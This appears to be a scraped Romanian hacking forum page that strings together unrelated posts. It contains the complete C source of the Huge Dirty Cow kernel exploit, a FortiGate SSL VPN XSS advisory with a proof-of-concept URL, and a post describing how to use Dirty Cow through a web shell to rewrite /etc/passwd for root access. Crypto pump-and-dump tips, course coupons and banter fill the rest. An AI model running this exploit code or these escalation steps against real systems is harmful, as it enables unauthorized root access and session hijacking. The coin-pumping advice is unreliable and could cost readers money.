Leaderboard

md5(crack_me.jpg) = C720E708AB375E531BB77DCA9DD08D38

Hi guys, my name is Z3r0n37 and I'm from Italy. I speak romanian but i don't know how to write, but i can read, I hope it's not a problem. I'm passionate of reverse enginireeng, malware analyzing, web security and pentesting.

"Huge Dirty Cow" POC A POC for the Huge Dirty Cow vulnerability (CVE-2017-1000405). Full details can be found here. Before running, make sure to set transparent huge pages to "always": echo always | sudo tee /sys/kernel/mm/transparent_hugepage/enabled Download HugeDirtyCowPOC-master.zip mirror: // // The Huge Dirty Cow POC. This program overwrites the system's huge zero page. // Compile with "gcc -pthread main.c" // // November 2017 // Bindecy // #define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> #include <sched.h> #include <string.h> #include <pthread.h> #include <sys/mman.h> #include <sys/types.h> #include <sys/wait.h> #define MAP_BASE ((void *)0x4000000) #define MAP_SIZE (0x200000) #define MEMESET_VAL (0x41) #define PAGE_SIZE (0x1000) #define TRIES_PER_PAGE (20000000) struct thread_args { char *thp_map; char *thp_chk_map; off_t off; char *buf_to_write; int stop; int mem_fd1; int mem_fd2; }; typedef void * (*pthread_proc)(void *); void *unmap_and_read_thread(struct thread_args *args) { char c; int i; for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) { madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Discard the temporary COW page. memcpy(&c, args->thp_map + args->off, sizeof(c)); read(args->mem_fd2, &c, sizeof(c)); lseek(args->mem_fd2, (off_t)(args->thp_map + args->off), SEEK_SET); usleep(10); // We placed the zero page and marked its PMD as dirty. // Give get_user_pages() another chance before madvise()-ing again. } return NULL; } void *write_thread(struct thread_args *args) { int i; for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) { lseek(args->mem_fd1, (off_t)(args->thp_map + args->off), SEEK_SET); madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Force follow_page_mask() to fail. write(args->mem_fd1, args->buf_to_write, PAGE_SIZE); } return NULL; } void *wait_for_success(struct thread_args *args) { while (args->thp_chk_map[args->off] != MEMESET_VAL) { madvise(args->thp_chk_map, MAP_SIZE, MADV_DONTNEED); sched_yield(); } args->stop = 1; return NULL; } int main() { struct thread_args args; void *thp_chk_map_addr; int ret; // Mapping base should be a multiple of the THP size, so we can work with the whole huge page. args.thp_map = mmap(MAP_BASE, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (args.thp_map == MAP_FAILED) { perror("[!] mmap()"); return -1; } if (args.thp_map != MAP_BASE) { fprintf(stderr, "[!] Didn't get desired base address for the vulnerable mapping.\n"); goto err_unmap1; } printf("[*] The beginning of the zero huge page: %lx\n", *(unsigned long *)args.thp_map); thp_chk_map_addr = (char *)MAP_BASE + (MAP_SIZE * 2); // MAP_SIZE * 2 to avoid merge args.thp_chk_map = mmap(thp_chk_map_addr, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (args.thp_chk_map == MAP_FAILED) { perror("[!] mmap()"); goto err_unmap1; } if (args.thp_chk_map != thp_chk_map_addr) { fprintf(stderr, "[!] Didn't get desired base address for the check mapping.\n"); goto err_unmap2; } ret = madvise(args.thp_map, MAP_SIZE, MADV_HUGEPAGE); ret |= madvise(args.thp_chk_map, MAP_SIZE, MADV_HUGEPAGE); if (ret) { perror("[!] madvise()"); goto err_unmap2; } args.buf_to_write = malloc(PAGE_SIZE); if (!args.buf_to_write) { perror("[!] malloc()"); goto err_unmap2; } memset(args.buf_to_write, MEMESET_VAL, PAGE_SIZE); args.mem_fd1 = open("/proc/self/mem", O_RDWR); if (args.mem_fd1 < 0) { perror("[!] open()"); goto err_free; } args.mem_fd2 = open("/proc/self/mem", O_RDWR); if (args.mem_fd2 < 0) { perror("[!] open()"); goto err_close1; } printf("[*] Racing. Gonna take a while...\n"); args.off = 0; // Overwrite every single page while (args.off < MAP_SIZE) { pthread_t threads[3]; args.stop = 0; ret = pthread_create(&threads[0], NULL, (pthread_proc)wait_for_success, &args); ret |= pthread_create(&threads[1], NULL, (pthread_proc)unmap_and_read_thread, &args); ret |= pthread_create(&threads[2], NULL, (pthread_proc)write_thread, &args); if (ret) { perror("[!] pthread_create()"); goto err_close2; } pthread_join(threads[0], NULL); // This call will return only after the overwriting is done pthread_join(threads[1], NULL); pthread_join(threads[2], NULL); args.off += PAGE_SIZE; printf("[*] Done 0x%lx bytes\n", args.off); } printf("[*] Success!\n"); err_close2: close(args.mem_fd2); err_close1: close(args.mem_fd1); err_free: free(args.buf_to_write); err_unmap2: munmap(args.thp_chk_map, MAP_SIZE); err_unmap1: munmap(args.thp_map, MAP_SIZE); if (ret) { fprintf(stderr, "[!] Exploit failed.\n"); } return ret; } Source: https://github.com/bindecy/HugeDirtyCowPOC

@Ossian nu exista un exploit pentru port 80, exista exploituri pentru un serviciul care este disponibil pe portul 80 - este o diferenta. In topicul anterior ti s-a recomandat si ti s-au dat link-uri spre materiale care iti explica ce este un port - citeste-le. Iti este greu sa intelegi de ce intrebarea ta este aberanta pentru ca nu ai in bagajul de cunostinte un numar de concepte de baza. Afla ce este si cum este folosit un port, afla ce este si cum functioneaza un server web (e.g. IIS, Apache, Nginx), afla ce este HTTP(S), afla care sunt vulnerabilitatile cele mai comune in sfera aplicatiilor web (OWASP top 10). Ai aici o lista de subiecte din care se da examenul CPSA (entry-level) la CREST - https://www.crest-approved.org/wp-content/uploads/crest-crt-cpsa-technical-syllabus-2.0.pdf. Vezi ce subiecte te intereseaza si incearca sa le intelegi. Inca o chestie, daca sistemul pe care tu il impungi cu exploituri nu iti apartine, sau nu ai primit autorizatie de la proprietar sau o persoana cu autoritatea necesara, atunci esti in afara legii. @dancezar "Ca sa reduci suprafata de atac trebuie sa verifici ce versiune de software este folosita" ai o idee gresita despre ce inseamna suprafata de atac. Spor!

Ca sa reduci numarul de exploit-uri ce trebuie incercate, verifici ce versiune de software este folosita. Vei vedea ca un apache cu versiunea la zi, nu o sa ai ce sa ii faci. Pot sa existe exploit-uri pentru o versiune de software, dar care functioneaza numai in anumite situatii. Dupa te duci mai departe, verifici ce hosteaza serverul, o platforma cunoscuta? Cauta-i versiunea si daca exista un exploit pentru acea versiune etc..

Nu exista ce cauti tu! Tiu s-a raspuns in topicul anterior. Daca ar gasi cineva asa ceva exploitul ar costa cateva sute de miliarde de $.

Salutare, aveti aici o lista cu diverse tutoriale pe Udemy cu cod de reducere, deci sunt gratis.Poate pe unii din voi va ajuta la ceva.Spor! https://justpaste.it/1c5r5

Ms pentru review, dar nu e nevoie aici, daca te-am putut ajuta cu ceva, cu placere. Am si site-urile care castiga automat, nici reclama nu ma mai obosesc sa fac :)))))doar comenzile le mai dau manual.. Dar se castiga mai bine cu crypto.... e mai amuzant

FortiGate SSL VPN Portal versions 5.6.2 and below, 5.4.6 and below, 5.2.12 and below, and 5.0 and below suffer from a cross site scripting vulnerability. ======================================================================= title: FortiGate SSL VPN Portal XSS Vulnerability product: Fortinet FortiOS vulnerable version: see: Vulnerable / tested versions fixed version: see: Solution CVE number: CVE-2017-14186 impact: Medium homepage: https://www.fortinet.com found: 2017-10-02 by: Stefan Viehböck (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Montreal - Moscow Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "From the start, the Fortinet vision has been to deliver broad, truly integrated, high-performance security across the IT infrastructure. We provide top-rated network and content security, as well as secure access products that share intelligence and work together to form a cooperative fabric. Our unique security fabric combines Security Processors, an intuitive operating system, and applied threat intelligence to give you proven security, exceptional performance, and better visibility and control--while providing easier administration." Source: https://www.fortinet.com/corporate/about-us/about-us.html Vulnerability overview/description: ----------------------------------- The FortiGate SSL VPN Portal is prone to a reflected cross-site scripting (XSS) vulnerability. The HTTP GET parameter "redir" is vulnerable. An attacker can exploit this vulnerability by tricking a victim to visit a URL. The attacker is able to hijack the session of the attacked user, and use this vulnerability in the course of spear-phishing attacks, e.g. by displaying a login prompt that sends credentials of victim back to the attacker. Note: This vulnerability is also an open redirect and is very similar to a vulnerability that was fixed in FortiOS in March 2016 (FG-IR-16-004). https://www.fortiguard.com/psirt/fortios-open-redirect-vulnerability Proof of concept: ----------------- The following request exploits the issue: https://vpn.<SERVER>.com/remote/loginredir?redir=javascript:alert(%22XSS%20%22%2Bdocument.location) The server responds with a page that looks as follows: --------------------------------------------------------------------------------------------------- <html><head> <script language="javascript"> document.location=decodeURIComponent("javascript%3Aalert%28%22XSS%20%22%2Bdocument.location%29"); </script> </head></html> --------------------------------------------------------------------------------------------------- Vulnerable / tested versions: ----------------------------- FortiOS 5.6.0 -> 5.6.2 FortiOS 5.4.0 -> 5.4.6 FortiOS 5.2.0 -> 5.2.12 FortiOS 5.0 and below More information can be found at: https://fortiguard.com/psirt/FG-IR-17-242 Vendor contact timeline: ------------------------ 2017-10-02: Contacting vendor through psirt@fortinet.com 2017-10-03: Vendor confirms vulnerability, assigns CVE-2017-14186. Expected fix in version 5.6.3 2017-11-23: Vendor provides update 2017-11-29: Coordinated public release of advisory Solution: --------- FortiOS 5.6 branch: Upgrade to upcoming 5.6.3 (ETA: November 27th) FortiOS 5.4 branch: Upgrade to 5.4.6 special build (*) or upcoming 5.4.7 (ETA Dec 7th) FortiOS 5.2 branch: Upgrade to 5.2.12 special build (*) or upcoming 5.2.13 (ETA: Dec 14th) More information can be found at: https://fortiguard.com/psirt/FG-IR-17-242 Workaround: ----------- Not available. # 0day.today [2017-12-04] # Source: 0day.today

update dupa 30 minute. Am cumparat 201.18 KORE am castigat 61usd in 30 minute. doar ca idee... o sa mai creasca pana maine...a fost un PUMP. (dar poate si scadea, asta-i viata)

oho... nu exista ceva sa pot scripta sau sa programez, am incercat... nu exista nici un patern... Pur si simplu caut pe net ce ICO-uri apar, ce software creaza, sau ce idei au... investesc in ele si astept. Iar la ICO-uri, nu e asa simplu.. trebuie sa te uiti dupa multe chestii pe care nu le pot spune aici. Dar ideea e ca functioneaza, pierzi castigi.... mai mult castigi la sfarsit de zi/saptamana/luna. Trebuie doar sa nu te panichezi si sa HODL moneda respectiva pana ajunge la un anumit prag... Uite: https://we.tl/s-idH2dUOpfV vezi astea ca sa-ti faci o idee despre trend...

BRAVO! Ia vezi, cumpara: https://bittrex.com/Market/Index?MarketName=BTC-KORE asta este ICO-ul lor: http://kore.life/ https://twitter.com/newkorecoin?lang=ro "it releases masternodes and wallet update this week" Este pretul 4.66 acum, fac pariu ca o sa faca 2X sapt viitoare Ia vezi si asta:

sunteti nobi! Luati d-aici.. cu 5k euro investitie si 4 luni dupa. http://prntscr.com/hio1kj http://prntscr.com/hio1no http://prntscr.com/hio1q3 Este doar un wallet virtual.. cu investitii curente. Nu cumparati nimic pana nu verificati bine innainte.

2. Da, poți fii in pericol. Atâta timp cât se inventează cryptere FUD. 1. Link urile primite de la “tovarăși” sau in e-mail-uri, care au ca context convingerea ta de a folosi acel program sau a vizualiza acel fișier. Te sfătuiesc sa te uiți pe la elearnsecurity am citit ceva foarte interesant despre viruși era intr-un anumit curs, nu mai știu cu exactitate care.

https://www.udemy.com/linux-made-easy-with-hands-on-training/?couponCode=LINUXMADEEASY4U https://www.udemy.com/giac-certified-incident-handler-practice-tests-for-2017/?couponCode=FRZFKNKJR29515 https://www.udemy.com/linux-made-easy-with-hands-on-training/?couponCode=LINUXMADEEASY4U https://www.udemy.com/redhat-certified-system-administrator-rhcsa-practice-tests/?couponCode=FZDFZG5495555

La multi ani rRomania!

Te-a luat de prost, si te-a prostit si mai tare.Da-i un sut in cur si divorteaza, sigur vei gasi 100 de alte "pisi" ca ea pe care sa le plimbi cu meleul.

Ce incredere sa mai aibe cand femeia il inseala cu el de mana?...

Divorț. Dacă tot ai ml, găsești una pentru fiecare noapte.

Web Hacking 101 is a good book, but is more of a list containing a short description on main vulnerabilities types, together with disclosed examples found in the wild, in the recent years. I'd also add Web Application Hacker's Handbook. It goes more in-depth in the bug bounty process: recon techniques, web technologies, defense mechanisms, application mapping, types of attack, tools etc. Keep an eye on HackerOne's disclosed bugs(Web Hacking 101 got a lot of examples from this place). Very useful resource on the latest found vulnerabilities.

Thanks. However, the "Web hacking 101" book would be almost everything what you need to start into the BB world.

[h=2]Awesome Penetration Testing[/h] A collection of awesome penetration testing resources, tools, books, confs, magazines and other shiny things Online Resources Penetration Testing Resources Shell Scripting Resources Linux Resources Shellcode development Social Engineering Resources Lock Picking Resources [*] Tools Penetration Testing Distributions Basic Penetration Testing Tools Vulnerability Scanners Network Tools Hex Editors Crackers Windows Utils DDoS Tools Social Engineering Tools Anonimity Tools Reverse Engineering Tools [*] Books Penetration Testing Books Hackers Handbook Series Network Analysis Books Reverse Engineering Books Malware Analysis Books Windows Books Social Engineering Books Lock Picking Books [*]Vulnerability Databases [*]Security Courses [*]Information Security Conferences [*]Information Security Magazines [*]Awesome Lists [*]Contribution [*]License [h=3][/h][h=3]Online Resources[/h] [h=4]Penetration Testing Resources[/h] Metasploit Unleashed - Free Offensive Security metasploit course PTES - Penetration Testing Execution Standard OWASP - Open Web Application Security Project OSSTMM - Open Source Security Testing Methodology Manual [h=4]Shell Scripting Resources[/h] LSST - Linux Shell Scripting Tutorial [h=4]Linux resources[/h] Kernelnewbies - A community of aspiring Linux kernel developers who work to improve their Kernels [h=4][/h][h=4]Shellcode development[/h] Shellcode Tutorials - Tutorials on how to write shellcode Shellcode examples - Shellcodes database [h=4][/h][h=4]Social Engineering Resources[/h] Social Engineering Framework - An information resource for social engineers [h=4][/h][h=4]Lock Picking Resources[/h] Schuyler Towne channel - Lockpicking videos and security talks [h=3][/h][h=3]Tools[/h] [h=4][/h][h=4]Penetration Testing Distributions[/h] Kali - A Linux distribution designed for digital forensics and penetration testing NST - Network Security Toolkit distribution Pentoo - security-focused livecd based on Gentoo BackBox - Ubuntu-based distribution for penetration tests and security assessments [h=4]Basic Penetration Testing Tools[/h] Metasploit - World's most used penetration testing software Burp - An integrated platform for performing security testing of web applications [h=4]Vulnerability Scanners[/h] Netsparker - Web Application Security Scanner Nexpose - Vulnerability Management & Risk Management Software Nessus - Vulnerability, configuration, and compliance assessment Nikto - Web application vulnerability scanner OpenVAS - Open Source vulnerability scanner and manager OWASP Zed Attack Proxy - Penetration testing tool for web applications w3af - Web application attack and audit framework Wapiti - Web application vulnerability scanner [h=4][/h][h=4]Networks Tools[/h] nmap - Free Security Scanner For Network Exploration & Security Audits tcpdump/libpcap - A common packet analyzer that runs under the command line Wireshark - A network protocol analyzer for Unix and Windows Network Tools - Different network tools: ping, lookup, whois, etc netsniff-ng - A Swiss army knife for for network sniffing Intercepter-NG - a multifunctional network toolkit [h=4]SSL Analysis Tools[/h] SSLyze - SSL configuration scanner [h=4]Hex Editors[/h] HexEdit.js - Browser-based hex editing [h=4]Crackers[/h] John the Ripper - Fast password cracker Online MD5 cracker - Online MD5 hash Cracker [h=4]Windows Utils[/h] Sysinternals Suite - The Sysinternals Troubleshooting Utilities Windows Credentials Editor - security tool to list logon sessions and add, change, list and delete associated credentials [h=4]DDoS Tools[/h] LOIC - An open source network stress tool for Windows JS LOIC - JavaScript in-browser version of LOIC [h=4]Social Engineering Tools[/h] SET - The Social-Engineer Toolkit from TrustedSec [h=4]Anonimity Tools[/h] Tor - The free software for enabling onion routing online anonymity I2P - The Invisible Internet Project [h=4]Reverse Engineering Tools[/h] IDA Pro - A Windows, Linux or Mac OS X hosted multi-processor disassembler and debugger WDK/WinDbg - Windows Driver Kit and WinDbg OllyDbg - An x86 debugger that emphasizes binary code analysis [h=3]Books[/h] [h=4]Penetration Testing Books[/h] The Art of Exploitation by Jon Erickson, 2008 Metasploit: The Penetration Tester's Guide by David Kennedy and others, 2011 Penetration Testing: A Hands-On Introduction to Hacking by Georgia Weidman, 2014 Rtfm: Red Team Field Manual by Ben Clark, 2014 The Hacker Playbook by Peter Kim, 2014 The Basics of Hacking and Penetration Testing by Patrick Engebretson, 2013 Professional Penetration Testing by Thomas Wilhelm, 2013 Advanced Penetration Testing for Highly-Secured Environments by Lee Allen,2012 Violent Python by TJ O'Connor, 2012 Fuzzing: Brute Force Vulnerability Discovery by Michael Sutton, Adam Greene, Pedram Amini, 2007 [h=4]Hackers Handbook Series[/h] The Shellcoders Handbook by Chris Anley and others, 2007 The Web Application Hackers Handbook by D. Stuttard, M. Pinto, 2011 iOS Hackers Handbook by Charlie Miller and others, 2012 Android Hackers Handbook by Joshua J. Drake and others, 2014 The Browser Hackers Handbook by Wade Alcorn and others, 2014 [h=4]Network Analysis Books[/h] Nmap Network Scanning by Gordon Fyodor Lyon, 2009 Practical Packet Analysis by Chris Sanders, 2011 Wireshark Network Analysis by by Laura Chappell, Gerald Combs, 2012 [h=4]Reverse Engineering Books[/h] Reverse Engineering for Beginners by Dennis Yurichev (free!) The IDA Pro Book by Chris Eagle, 2011 Practical Reverse Engineering by Bruce Dang and others, 2014 Reverse Engineering for Beginners [h=4]Malware Analysis Books[/h] Practical Malware Analysis by Michael Sikorski, Andrew Honig, 2012 The Art of Memory Forensics by Michael Hale Ligh and others, 2014 [h=4]Windows Books[/h] Windows Internals by Mark Russinovich, David Solomon, Alex Ionescu [h=4]Social Engineering Books[/h] The Art of Deception by Kevin D. Mitnick, William L. Simon, 2002 The Art of Intrusion by Kevin D. Mitnick, William L. Simon, 2005 Ghost in the Wires by Kevin D. Mitnick, William L. Simon, 2011 No Tech Hacking by Johnny Long, Jack Wiles, 2008 Social Engineering: The Art of Human Hacking by Christopher Hadnagy, 2010 Unmasking the Social Engineer: The Human Element of Security by Christopher Hadnagy, 2014 [h=4][/h][h=4]Lock Picking Books[/h] Practical Lock Picking by Deviant Ollam, 2012 Keys to the Kingdom by Deviant Ollam, 2012 [h=3]Vulnerability Databases[/h] NVD - US National Vulnerability Database CERT - US Computer Emergency Readiness Team OSVDB - Open Sourced Vulnerability Database Bugtraq - Symantec SecurityFocus Exploit-DB - Offensive Security Exploit Database Fulldisclosure - Full Disclosure Mailing List MS Bulletin - Microsoft Security Bulletin MS Advisory - Microsoft Security Advisories Inj3ct0r - Inj3ct0r Exploit Database Packet Storm - Packet Storm Global Security Resource SecuriTeam - Securiteam Vulnerability Information CXSecurity - CSSecurity Bugtraq List Vulnerability Laboratory - Vulnerability Research Laboratory ZDI - Zero Day Initiative [h=3][/h][h=3]Security Courses[/h] Offensive Security Training - Training from BackTrack/Kali developers SANS Security Training - Computer Security Training & Certification Open Security Training - Training material for computer security classes CTF Field Guide - everything you need to win your next CTF competition [h=3]Information Security Conferences[/h] DEF CON - An annual hacker convention in Las Vegas Black Hat - An annual security conference in Las Vegas BSides - A framework for organising and holding security conferences CCC - An annual meeting of the international hacker scene in Germany DerbyCon - An annual hacker conference based in Louisville PhreakNIC - A technology conference held annually in middle Tennessee ShmooCon - An annual US east coast hacker convention CarolinaCon - An infosec conference, held annually in North Carolina HOPE - A conference series sponsored by the hacker magazine 2600 SummerCon - One of the oldest hacker conventions, held during Summer Hack.lu - An annual conference held in Luxembourg HITB - Deep-knowledge security conference held in Malaysia and The Netherlands Troopers - Annual international IT Security event with workshops held in Heidelberg, Germany Hack3rCon - An annual US hacker conference ThotCon - An annual US hacker conference held in Chicago LayerOne - An annual US security conerence held every spring in Los Angeles DeepSec - Security Conference in Vienna, Austria SkyDogCon - A technology conference in Nashville [h=3][/h][h=3]Information Security Magazines[/h] 2600: The Hacker Quarterly - An American publication about technology and computer "underground" Hakin9 - A Polish online, weekly publication on IT Security [h=3]Awesome Lists[/h] SecTools - Top 125 Network Security Tools C/C++ Programming - One of the main language for open source security tools .NET Programming - A software framework for Microsoft Windows platform development Shell Scripting - Command-line frameworks, toolkits, guides and gizmos Ruby Programming by @SiNdresorhus - JavaScript in command-line Node.js Programming by @vndmtrx - JavaScript in command-line Python tools for penetration testers - Lots of pentesting tools are written in Python Python Programming by @svaksha - General Python programming Python Programming by @vinta - General Python programming Andorid Security - A collection of android security related resources Awesome Awesomness - The List of the Lists [h=3][/h][h=3]Contribution[/h] Your contributions and suggestions are heartily? welcome. (????) [h=3][/h][h=3]License[/h] This work is licensed under a Creative Commons Attribution 4.0 International License Sursa: https://github.com/enaqx/awesome-pentest

Cu toate ca a aparut acum 10 ani, bug-ul a fost fixed pe 18 octombrie anul asta. Pe scurt, pentru cei interesati, cateva informatii utile: - exploitul nu se poate executa remote (trebuie sa poti executa comenzile pe sistem); Pentru a putea folosi remote acest exploit e nevoie de alta vulnerabilitate care sa va dea acces la sistemul tinta. Exemplu simplu prin care se poate exploata (nu remote): un web shell. Presupunem ca un server ruleaza o aplicatie web care are o vulnerabilitate ce ne permite sa uploadam un web shell ^aka sa executam comenzi de sistem. In principiu, aceste comenzi sunt executate ca si low-privileged user (cateodata numit www-data sau ceva asemanator) Cu acest exploit poti sa faci overwrite la /etc/passwd pentru a da fisierului www-data UID-ul 0 => privilegii de root. Am incercat asta pe o masina virtuala si totusi nu a mers. In cazul asta, poti seta UID-ul unui user la 0, insa va trebui sa va relogati dupa (nu e chiar o optiune pentru ca avem doar un web shell). Cateva limitari ale exploitului: - poti face overwrite doar la byte existenti (nu ai cum sa adaugi ceva intr-un fisier). - eu unul nu am putut scrie mai mult de 4 kb intr-un fisier. Apropo, a mai fost postat de @Silviu aici.

La ce nume de cocalari are si imagini cu pitiponci, nu as lua-o nici gratis.

am inteles, merci pt info, inseamna ca astea-s preturile actuale

1,63€ mi se pare prea putin ..tu sa reusesti sa vinzi pe un site, trebuie sa investesti foarte mult in reclama, seo

Clam Checker? Ti-ai gasit prosti? Muie! P.S. aici nu e market

Ca tot e free for all in thread, oferta initiala ramane. Comision 10%.

Eth luat acum ceva vreme cand era 300. Pentru durata lunga, minim 5-7 ani, orice s-ar intampla, si sa ajunga la 1 cent.

Nostalgia bat-o vina.

Hi all, I'm a businessman and I want to build a team to develop my business ideas! I'm looking for serious people to implement my ideas that will bring good profits, I do not ask for any money, I just ask a serious person to listen to me about what I'm thinking about and think about it, I'm collecting a team no more than 3-4 peopleHere is my contact: m1tn1ck@jabber.cryptoparty.isПривет всем, я бизнесмен, и я хочу создать команду для разработки моих бизнес-идей! Я ищу серьезных людей для реализации моих идей, которые принесут хорошую прибыль, я не прошу денег, я просто прошу серьезного человека послушать меня о том, о чем я думаю, и подумать об этом, я Сбор сборной не более 3-4 человекВот мой контакт: m1tn1ck@jabber.cryptoparty.is

Ce este un Google?

Ai sub 14 ani? daca da atunci poate imi fac timp sa iti traduc definitia si exemplele de pe google. (sa-ti traduc din romana in romana) Daca ai peste 14 nu ai scuza ca nu te duce mintea sa citesti un paragraf de pe wikipedia si sa il intelegi. Sau esti troll..

.:Ma obsedeaza foarte tare. Ce este un exploit?